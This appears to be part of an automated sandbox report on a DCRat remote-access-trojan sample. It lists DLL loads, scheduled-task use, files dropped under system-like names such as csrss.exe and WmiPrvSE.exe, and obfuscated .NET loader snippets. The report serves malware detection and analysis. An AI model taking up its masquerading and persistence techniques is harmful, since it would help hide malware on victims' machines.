              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
              Source: C:\Users\user\cmd.exeSection loaded: mscoree.dll
              Source: C:\Users\user\cmd.exeSection loaded: apphelp.dll
              Source: C:\Users\user\cmd.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\cmd.exeSection loaded: version.dll
              Source: C:\Users\user\cmd.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Users\user\cmd.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\cmd.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\cmd.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\cmd.exeSection loaded: windows.storage.dll
              Source: C:\Users\user\cmd.exeSection loaded: wldp.dll
              Source: C:\Users\user\cmd.exeSection loaded: profapi.dll
              Source: C:\Users\user\cmd.exeSection loaded: cryptsp.dll
              Source: C:\Users\user\cmd.exeSection loaded: rsaenh.dll
              Source: C:\Users\user\cmd.exeSection loaded: cryptbase.dll
              Source: C:\Users\user\cmd.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
              Source: C:\Users\user\cmd.exeSection loaded: mscoree.dll
              Source: C:\Users\user\cmd.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\cmd.exeSection loaded: version.dll
              Source: C:\Users\user\cmd.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Users\user\cmd.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\cmd.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\cmd.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\cmd.exeSection loaded: windows.storage.dll
              Source: C:\Users\user\cmd.exeSection loaded: wldp.dll
              Source: C:\Users\user\cmd.exeSection loaded: profapi.dll
              Source: C:\Users\user\cmd.exeSection loaded: cryptsp.dll
              Source: C:\Users\user\cmd.exeSection loaded: rsaenh.dll
              Source: C:\Users\user\cmd.exeSection loaded: cryptbase.dll
              Source: C:\Users\user\cmd.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
              Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exeSection loaded: mscoree.dll
              Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exeSection loaded: apphelp.dll
              Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exeSection loaded: version.dll
              Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exeSection loaded: uxtheme.dll
              Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exeSection loaded: windows.storage.dll
              Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exeSection loaded: wldp.dll
              Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exeSection loaded: profapi.dll
              Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exeSection loaded: cryptsp.dll
              Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exeSection loaded: rsaenh.dll
              Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exeSection loaded: cryptbase.dll
              Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
              Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exeSection loaded: mscoree.dll
              Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exeSection loaded: version.dll
              Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exeSection loaded: uxtheme.dll
              Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exeSection loaded: windows.storage.dll
              Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exeSection loaded: wldp.dll
              Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exeSection loaded: profapi.dll
              Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exeSection loaded: cryptsp.dll
              Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exeSection loaded: rsaenh.dll
              Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exeSection loaded: cryptbase.dll
              Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exeSection loaded: sspicli.dll
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exeSection loaded: mscoree.dll
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exeSection loaded: apphelp.dll
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exeSection loaded: kernel.appcore.dll
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exeSection loaded: version.dll
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exeSection loaded: uxtheme.dll
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exeSection loaded: windows.storage.dll
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exeSection loaded: wldp.dll
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exeSection loaded: profapi.dll
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exeSection loaded: cryptsp.dll
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exeSection loaded: rsaenh.dll
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exeSection loaded: cryptbase.dll
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exeSection loaded: sspicli.dll
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exeSection loaded: mscoree.dll
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exeSection loaded: kernel.appcore.dll
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exeSection loaded: version.dll
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exeSection loaded: uxtheme.dll
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exeSection loaded: windows.storage.dll
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exeSection loaded: wldp.dll
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exeSection loaded: profapi.dll
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exeSection loaded: cryptsp.dll
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exeSection loaded: rsaenh.dll
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exeSection loaded: cryptbase.dll
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
              Source: C:\Users\user\Desktop\cougif6lqM.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
              Source: JavaClient.lnk.2.drLNK file: ..\..\..\..\..\..\Local\Temp\javaclient.exe
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Users\user\Desktop\cougif6lqM.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeDirectory created: C:\Program Files\Windows Mail\WmiPrvSE.exeJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeDirectory created: C:\Program Files\Windows Mail\24dbde2999530eJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeDirectory created: C:\Program Files\Windows Security\BrowserCore\en-US\csrss.exeJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeDirectory created: C:\Program Files\Windows Security\BrowserCore\en-US\886983d96e3d3eJump to behavior
              Source: cougif6lqM.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
              Source: cougif6lqM.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
              Source: cougif6lqM.exeStatic file information: File size 1265664 > 1048576
              Source: cougif6lqM.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x11de00
              Source: cougif6lqM.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: DCRatBuild.exe, 00000003.00000003.1330292606.0000000006981000.00000004.00000020.00020000.00000000.sdmp, DCRatBuild.exe, 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp, DCRatBuild.exe, 00000003.00000000.1328766355.0000000000F33000.00000002.00000001.01000000.00000007.sdmp, DCRatBuild.exe.0.dr

              Data Obfuscation

              barindex
              .NET source code contains method to dynamically call methods (often used by packers)
              Source: javaclient.exe.0.dr, 4KZlQoO1svmgdm30ZchiekvS1KW0OxLVyydzOO.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{nsDvajUNOxq8slf7VTQIqNti6uU9kwMBSkPQt16B0uEh8eyI5tNgxVgXsAz0JOsfkR28P90WkyucbAS3GJ0UL4rMGP05MIE.MI1iEGpW09rVqJDMiyqjSjXkppRwekowAYmEmg3pb6kcQuE1jVL1ZmLVqVd7DiPXYn4vXWfHZBgSuX4FKWVR4q7Z7RnTJS6,nsDvajUNOxq8slf7VTQIqNti6uU9kwMBSkPQt16B0uEh8eyI5tNgxVgXsAz0JOsfkR28P90WkyucbAS3GJ0UL4rMGP05MIE.BgQ85B6mTS7oT9yGU6XmtQTNLu5qGbk8HGPkkhr9gxIGDJnLCscbRJeDHLbH4Uy7PofCWipjM5GmzRLc3D02d85OppS0bC6,nsDvajUNOxq8slf7VTQIqNti6uU9kwMBSkPQt16B0uEh8eyI5tNgxVgXsAz0JOsfkR28P90WkyucbAS3GJ0UL4rMGP05MIE.tsOa7UX43EE5W1KKyLrKGnrf5yroCfKtC5qUOB1y6TQOJBDxV1uOAnITqndYtRK9PTLIbLjmEaAnGZte5vBi6OOUoIL4ozc,nsDvajUNOxq8slf7VTQIqNti6uU9kwMBSkPQt16B0uEh8eyI5tNgxVgXsAz0JOsfkR28P90WkyucbAS3GJ0UL4rMGP05MIE.j0UmkmvXqRQhxoux08TIUtdT2Kw8SmPyO02DWNlR7Citb8uPYC8eZjcqnBVhm5cgeZhEWYKaN53vP4pVQ0jrrirGQEvxwIQ,mRMv10HbZpwLFNjCwmoHBKxrw0NcMSjvzittQ7G5wQNBNo8SaleZ11W6JDVJ762DAuQ5l0.bXowFz0Fht9cTCjkkACvmbEys0sgrUAJVtJHNPngz2C9ilgh4MeGc2q()}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: javaclient.exe.0.dr, 4KZlQoO1svmgdm30ZchiekvS1KW0OxLVyydzOO.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{_6YWdCkLrLmys75hT200Cmxk4GnfNHJCMiD3W7s85plRmVyqloZabeo5Ty0z2weNbiw28oJ[2],mRMv10HbZpwLFNjCwmoHBKxrw0NcMSjvzittQ7G5wQNBNo8SaleZ11W6JDVJ762DAuQ5l0.VjkYlsWRf6S5vtySuMpeNjXGtfHROsbku2bRXEkN6tqtSNeXr9oaRYB(Convert.FromBase64String(_6YWdCkLrLmys75hT200Cmxk4GnfNHJCMiD3W7s85plRmVyqloZabeo5Ty0z2weNbiw28oJ[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, PVStjT4hn5scdS4lfYS.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, PVStjT4hn5scdS4lfYS.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
              .NET source code contains potential unpacker
              Source: javaclient.exe.0.dr, 4KZlQoO1svmgdm30ZchiekvS1KW0OxLVyydzOO.cs.Net Code: hja93SIc1BJIhS3C3Hb9fbirVCuS76pOIbvFCY System.AppDomain.Load(byte[])
              Source: javaclient.exe.0.dr, 4KZlQoO1svmgdm30ZchiekvS1KW0OxLVyydzOO.cs.Net Code: GXBdzhkuOHWVlLRph5t6A8vXW9QzcpKRIegEn2PF5hLbWs1JdguSoVPuiZX7V8SNQ87UT0 System.AppDomain.Load(byte[])
              Source: javaclient.exe.0.dr, 4KZlQoO1svmgdm30ZchiekvS1KW0OxLVyydzOO.cs.Net Code: GXBdzhkuOHWVlLRph5t6A8vXW9QzcpKRIegEn2PF5hLbWs1JdguSoVPuiZX7V8SNQ87UT0
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, tp1VHAMlJ4NNAG3oSlG.cs.Net Code: B8iblQIJNa System.AppDomain.Load(byte[])
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, tp1VHAMlJ4NNAG3oSlG.cs.Net Code: B8iblQIJNa System.Reflection.Assembly.Load(byte[])
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, tp1VHAMlJ4NNAG3oSlG.cs.Net Code: B8iblQIJNa
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, tp1VHAMlJ4NNAG3oSlG.cs.Net Code: B8iblQIJNa System.AppDomain.Load(byte[])
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, tp1VHAMlJ4NNAG3oSlG.cs.Net Code: B8iblQIJNa System.Reflection.Assembly.Load(byte[])
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, tp1VHAMlJ4NNAG3oSlG.cs.Net Code: B8iblQIJNa
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeFile created: C:\Componenthost\__tmp_rar_sfx_access_check_6408531Jump to behavior
              Source: DCRatBuild.exe.0.drStatic PE information: section name: .didat
              Source: C:\Users\user\Desktop\cougif6lqM.exeCode function: 0_2_00007FF886EE00BD pushad ; iretd 0_2_00007FF886EE00C1
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 3_2_00F1E28C push eax; ret 3_2_00F1E2AA
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 3_2_00F1ED46 push ecx; ret 3_2_00F1ED59
              Source: C:\Componenthost\providerreviewdhcp.exeCode function: 7_2_00007FF886EA81F1 push eax; ret 7_2_00007FF886EA81F2
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FF886DAD2A5 pushad ; iretd 23_2_00007FF886DAD2A6
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FF886EC00BD pushad ; iretd 23_2_00007FF886EC00C1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FF886F97BFC push esp; iretd 23_2_00007FF886F97BFD
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FF886F92316 push 8B485F93h; iretd 23_2_00007FF886F9231B
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FF886F97F5F push ecx; iretd 23_2_00007FF886F97F61
              Source: C:\Users\user\cmd.exeCode function: 29_2_00007FF886EB81F1 push eax; ret 29_2_00007FF886EB81F2
              Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exeCode function: 38_2_00007FF886ED81F1 push eax; ret 38_2_00007FF886ED81F2
              Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exeCode function: 40_2_00007FF886EDBDE4 push E8FFFFFEh; ret 40_2_00007FF886EDBDE9
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exeCode function: 41_2_00007FF886EBBDE4 push E8FFFFFEh; ret 41_2_00007FF886EBBDE9
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exeCode function: 42_2_00007FF886EDBDE4 push E8FFFFFEh; ret 42_2_00007FF886EDBDE9
              Source: cougif6lqM.exeStatic PE information: section name: .text entropy: 7.998330200111187
              Source: providerreviewdhcp.exe.3.drStatic PE information: section name: .text entropy: 7.007324800883365
              Source: javaclient.exe.0.dr, Wb9Rc9BKarUg4RFrypNZgV5pqwxCjwKP0mOIvI7cU5KsXP7jz33huhq.csHigh entropy of concatenated method names: '_7Dodhkcxy1E5ftdZvP4no0Y3YihssqBR7eKappwUVa9YfeDZ5y5hN3g', 'dnM6evhItMX1jC4Oq26I56UZ8MtF5TCfi6DTC42zLtrO1grNHf5br8c', 'WMo1RARL3wwEDW4XC63E0lY7si2pkpLaTiskkOfpl6NsroMI0PDdXXS', 'BbGYcqsj23Jn3wt', 'K5i2CiVuJycyNj3', 'sfB4jN90PlAWn04', '_3Tc1rNcs6k9YCJi', 'I56bu7FRXyUSMMq', '_1IeUyMEaoFL2lgg', 'Gvay2SuToTVFvaH'
              Source: javaclient.exe.0.dr, MI7ahEwb4RMEdcFmjxSqMeyJdvN5L0m6OSY7Uw26JfXl44hUzuBW1R0Nt2PrzwVgcqogYZJfjFGmH6.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'uU9mlenMSBi5RvAipxsEbzRt53u0Fm', 'pXdIG3Z60U1u89cn7aX0d0xoNj1dFg', 'Okrdi5XIAsrn6ZTg6qx58AzeEpgeiQ', '_1q7cR5BmThtwxjv7QjkFB20BtAOPmR'
              Source: javaclient.exe.0.dr, 4KZlQoO1svmgdm30ZchiekvS1KW0OxLVyydzOO.csHigh entropy of concatenated method names: 'b5mqe6JRfZNHFUjoGQz3LjKtro4Q4BaCxl4gEK', 'hja93SIc1BJIhS3C3Hb9fbirVCuS76pOIbvFCY', 'UXv4Pu7mYXDyNw5okxvR54Y2DbUkOqJai2I8gm', 'ppWQQf9bkdt1F9r5hsHfXoLVGNXlwmbAdxTYC4', '_0k3Xdphz4IM7dBZsziG4z5dUanracmaqrMAnBG', 'nKNpkxsStkIpVe0JXSQ7DxNyK1AUyl5saJ47rX', 'KMZC56EUJoQaaQufXl8T3vmpnGnThv62EYOJri', 'JA9DnT8YB2KxTMRFxbAcTmNwEmlFc4ACUq8JR6', 'iXJVYNExaSpn5oP5urblptW1gzSuxQizdD7L0hh5Z7Nk3BFEqEP3ajy8W4rXkTFAE0WHiG', 'spI6G4govUedjBJPBUVS2Oq35Ou7LbcdsWx3xXbIKbYGmwpEkXCzszGPL1rBJC5C7AbuLV'
              Source: javaclient.exe.0.dr, oZUeEdN0kIwhXAwI69kFxA2hZhkNBzdXM1rm5RCd4nrldYnWQyO1s3GSV3ejssi646Zqih.csHigh entropy of concatenated method names: 'yQzifzBfK2E2JSktt3uwXZZb0lM9HuQh64bKdz0oiZZJlbOM7Oo555Y4R6bbAixRm24BGC', '_5AKH5csiFn0ttfR', 'LpNLuceP2gZDRqu', 'oDIOEtIUIz86pQr', 'XHPGxAFVkTsds5f'
              Source: javaclient.exe.0.dr, 3z47e5yEjIaC9B1hDFt6A9GQj3CJfYkuSeX7YESjPnVRjJ5Lso5r5fInPHg76SuXxJGGfH.csHigh entropy of concatenated method names: '_044ZGqcxT8DbFFMXqJkcBsWrmeW91hwrUniADcIISPZlc7Kc8ZoJVjy5ao8pik7ODnCwPi', 'kawteYpuc2jo9rVLaJ9fmx70APVCd4JcIIbV1Ey4JvbzJ1LRH0ALYXkzP8mcp45v28krOv', 'pWXwIHYd2f2gwi7LHxDSnEcNWD4cJHWkTVBNxbH0MvtzG3tNTqdC6kiDF3fTtULVaVDgEm', 'qy7pBgaPYi3jKms2AVsYWvs3e26X7TZZ98YUqprnrhFouY3hQlOFxnwmyIsFBGTZU9rjFt', 'C2hHtHcUQ6K4uQA', 'bRiIfCm3HLhGzzR', 'AgDZT3UxuB1fpvt', 'vcnAbAZi2SHGSWE', 'irmtPOmPRnYeGwn', 'gzpzPrTJuoTUCbt'
              Source: javaclient.exe.0.dr, Xy6KZgd0DSmU2NM9zvDSxkdHCTCy6myCJgvl3v.csHigh entropy of concatenated method names: 'h01TyDQuQg0sopOjh1fD9JFutvfb35wzIUrSZy', 'cjcACayLYhSZTnKJVdmOpciYCtfrIjhz5q8jIH', 'Z5XLfWxTOk0hRysOCkjDig957yvDewwTuxYiFU', '_8AQfKPx4T1BaADZIwn8eZ1Wn9MHHNlBdEGDgEO', 'AlQAopl4PqMy6dHZBKSc4R9DXHLjIr', 'iaqTG8cCAV4G9aoj3v4cZyIj3Gx69W', 's1ECtgGv8xOexAl8lLZqGAQpIOpPFR', 'ur0HKTUP9CniK8D6KwRtL7JFsmYt6A', 'ttaEGBQtcuHNVUmjuch3cpsVV9mCVL', '_9cJ7E1WD0g6iix59IFZ51htZXvtBEG'
